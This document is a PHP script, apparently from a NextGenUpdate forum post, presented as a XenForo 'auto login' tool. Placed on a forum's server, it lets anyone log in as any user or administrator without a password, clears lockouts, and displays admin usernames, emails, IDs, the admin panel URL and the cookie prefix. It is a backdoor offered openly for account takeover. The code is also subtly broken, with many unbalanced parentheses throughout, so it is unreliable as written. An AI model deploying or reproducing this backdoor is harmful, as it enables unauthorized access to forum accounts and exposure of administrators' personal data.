<?php
/*
* XenForo Auto Login as user script.
* This allows anyone to login as a user
* without a password.
*
* Forum Software: XenForo
* Programming Language: PHP
* Version: 1.0.0
*
*/
$username = (isset($_POST['username']) && !empty($_POST['username'])) ? $_POST['username'] : '';
$startTime = microtime(true);
$fileDir = dirname(__FILE__);
require($fileDir . '/library/XenForo/Autoloader.php';
XenForo_Autoloader::getInstance()->setupAutoloader($fileDir . '/library';
XenForo_Application::initialize($fileDir . '/library', $fileDir);
XenForo_Application::set('page_start_time', $startTime);
$dependencies = new XenForo_Dependencies_Public();
$dependencies->preLoadData();
XenForo_Session::startPublicSession();
$db = XenForo_Application::get('db';
$config = XenForo_Application::get('config';
$errors = array();
$logins = array();
$adminModel = new XenForo_Model_Admin();
if (strlen($username) > 0)
{
$userModel = new XenForo_Model_User();
$loginModel = new XenForo_Model_Login();
$user = $userModel->getUserByNameOrEmail($username);
if (!$user)
{
$errors[] = 'Failed to find username';
}
if (empty($errors))
{
foreach ($_COOKIE as $key => $val)
{
setcookie($key, '', time()-3600);
}
$loginModel->clearLoginAttempts($username); // Clears login attempts (Unblocks account if blocked for some reason)
$userModel->setUserRememberCookie($user['user_id']);
$userModel->deleteSessionActivity(0, $_SERVER['REMOTE_ADDR']);
$visitor = XenForo_Visitor::setup($user['user_id']);
XenForo_Application::getSession()->userLogin($user['user_id'], $visitor['password_date']);
$class = XenForo_Application::resolveDynamicClass('XenForo_Session';
$publicSession = new $class();
$publicSession->start();
if (!$publicSession->get('user_id')
{
$publicSession->userLogin($user['user_id'], $visitor['password_date']);
$publicSession->save();
}
$adminSession = XenForo_Session::startAdminSession();
if (!$adminSession->get('user_id')
{
$adminSession->userLogin($user['user_id'], $visitor['password_date']);
$adminSession->save();
}
$logins[] = 'You have logged in successfully!';
$logins[] = 'Username: ' . htmlspecialchars($user['username'], ENT_COMPAT, 'UTF-8', false);
}
}
$page = array(
'admin_urls' => array(
XenForo_Link::buildAdminLink('index'
),
'admins' => $adminModel->getAllAdmins()
);
?>
<!DOCTYPE HTML>
<html lang="en">
<head>
<title>XenForo Auto-Login | ACP Login</title>
<script type="text/javascript">
<?php
if (!empty($errors)) {
foreach ($errors as $error)
{
echo "alert('{$error}';";
}
}
if (!empty($logins)) {
foreach ($logins as $login)
{
echo "alert('{$login}';";
}
}
?>
</script>
</head>
<body>
<h1>XenForo Auto-Login | ACP Login</h1>
<hr />
<form method="post">
<input type="text" autocomplete="off" name="username" />
<input type="submit" name="submit" value="Login As User" />
</form>
<hr />
<p>Admin Control Panel file is located at</p>
<p>
<?php
if (!empty($page['admin_urls']))
{
foreach ($page['admin_urls'] as $admin_url)
{
printf('<p><a href="%s">%s</a></p>', htmlspecialchars($admin_url), htmlspecialchars($admin_url));
}
}
?>
</p>
<hr />
<p>Admin Users:</p>
<?php
foreach ($page['admins'] as $admin)
{
printf(
'<p>Username: %s Email: %s User I %s</p>',
htmlspecialchars($admin['username'], ENT_COMPAT, 'UTF-8', false),
htmlspecialchars($admin['email'], ENT_COMPAT, 'UTF-8', false),
intval($admin['user_id']));
}
?>
<hr />
<p>Cookie prefix: <?php echo htmlspecialchars($config->cookie->prefix, ENT_COMPAT, 'UTF-8', false); ?></p>
<hr />
<h6>This file allows you to login to the control panel and forums as anyone. It also tries to find the admin control panel file.</h6>
</body>
</html>
Copyright © 2024, NextGenUpdate.
All Rights Reserved.